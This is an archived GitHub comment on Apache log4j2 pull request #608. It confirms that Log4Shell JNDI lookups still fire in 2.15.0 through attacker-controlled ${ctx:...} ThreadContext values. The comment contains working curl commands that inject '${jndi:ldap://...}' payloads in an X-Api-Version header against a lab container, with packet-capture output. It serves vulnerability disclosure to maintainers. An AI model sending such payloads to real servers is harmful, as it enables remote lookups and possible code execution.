Posted to notifications@logging.apache.org by GitBox <gi...@apache.org> on 2021/12/14 12:00:17 UTC
[GitHub] [logging-log4j2] SpComb commented on pull request #608: Restrict LDAP access via JNDI
SpComb commented on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-993469509
> Following up on my question if this fixes usage with other property substitutions like ctx: [#608 (comment)](https://github.com/apache/logging-log4j2/pull/608#issuecomment-992427010)
>
> Apparently I could confirm my assumption regarding the usage of Thread Context Map, I created a PR here ([lunasec-io/lunasec#298](https://github.com/lunasec-io/lunasec/pull/298)) and made changes to the demonstration app to demonstrate the vulnerability even with `formatMsgNoLookups=true` set shown here: https://github.com/kmindi/log4shell-vulnerable-app.
>
> Here is also the diff to see what I changed to demonstrate vulnerable `${ctx.apiversion}` usage in the log pattern: [kmindi/log4shell-vulnerable-app@e539f7e](https://github.com/kmindi/log4shell-vulnerable-app/commit/e539f7e9a0c81e2c580d63caff5f4eae14033f19)
>
> Can someone confirm this?
Yes: `curl -v 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://example.net/test}'` results in a DNS lookup with 2.14.1, whereas the attacker-controlled input in the message field does not:
```
41 17.676741911 172.17.0.1 -> 172.17.0.2 HTTP 209 GET / HTTP/1.1
42 17.676769664 172.17.0.2 -> 172.17.0.1 TCP 66 8080 > 56934 [ACK] Seq=1 Ack=144 Win=30080 Len=0 TSval=346936700 TSecr=2382643118
43 17.680613689 172.17.0.2 -> 10.52.0.2 DNS 79 Standard query 0xffa9 A example.net
44 17.680814368 10.52.0.2 -> 172.17.0.2 DNS 79 Standard query response 0xffa9 No such name
45 17.687397342 172.17.0.2 -> 172.17.0.1 HTTP 193 HTTP/1.1 200 (text/plain)
```
The bad news: this seems to also work with 2.15.0; `X-Api-Version: ${jndi:ldap://localhost/test}` results in a TCP connection to localhost:389:
```
$ docker exec -it log4shell-vulnerable-app jar -tvf /app/spring-boot-application.jar | grep log4j
828 Tue Dec 14 11:55:34 GMT 2021 BOOT-INF/classes/log4j2.properties
24231 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-slf4j-impl-2.15.0.jar
1789769 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-core-2.15.0.jar
30947 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-jul-2.15.0.jar
301804 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-api-2.15.0.jar
```
```
$ curl -v "$(docker inspect -f '{{.NetworkSettings.IPAddress}}' log4shell-vulnerable-app):8080/" -H 'X-Api-Version: ${jndi:ldap://localhost/test}'
* Trying 172.17.0.2:8080...
* Connected to 172.17.0.2 (172.17.0.2) port 8080 (#0)
> GET / HTTP/1.1
> Host: 172.17.0.2:8080
> User-Agent: curl/7.76.1
> Accept: */*
> X-Api-Version: ${jndi:ldap://localhost/test}
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Content-Type: text/plain;charset=UTF-8
< Content-Length: 13
< Date: Tue, 14 Dec 2021 11:57:10 GMT
<
* Connection #0 to host 172.17.0.2 left intact
Hello, world![
```
```
$ sudo nsenter -t "$(docker inspect -f '{{.State.Pid}}' log4shell-vulnerable-app)" -n tshark -i lo -n
Running as user "root" and group "root". This could be dangerous.
Capturing on 'Loopback'
1 0.000000000 127.0.0.1 -> 127.0.0.1 TCP 74 38380 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426441 TSecr=0 WS=128
2 0.000013194 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38380 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
3 0.023625945 127.0.0.1 -> 127.0.0.1 TCP 74 38382 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426464 TSecr=0 WS=128
4 0.023636425 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38382 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
5 0.027652034 127.0.0.1 -> 127.0.0.1 TCP 74 38384 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426468 TSecr=0 WS=128
6 0.027662963 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38384 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
7 0.042974136 127.0.0.1 -> 127.0.0.1 TCP 74 38386 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426484 TSecr=0 WS=128
8 0.042985398 127.0.0.1 -> 127.0.0.1 TCP 54 389 > 38386 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
```
This requires a pattern configured to use `${ctx:...}` lookups with attacker-controlled `ThreadContext` values, which seem to get expanded recursively.
The JNDI restrictions work correctly (no DNS lookups for `example.net`, only `localhost` connections), but the LOG4J2-3198 change ("disable message lookups by default", https://issues.apache.org/jira/browse/LOG4J2-3198) does not seem to apply to `${ctx:...}` lookups.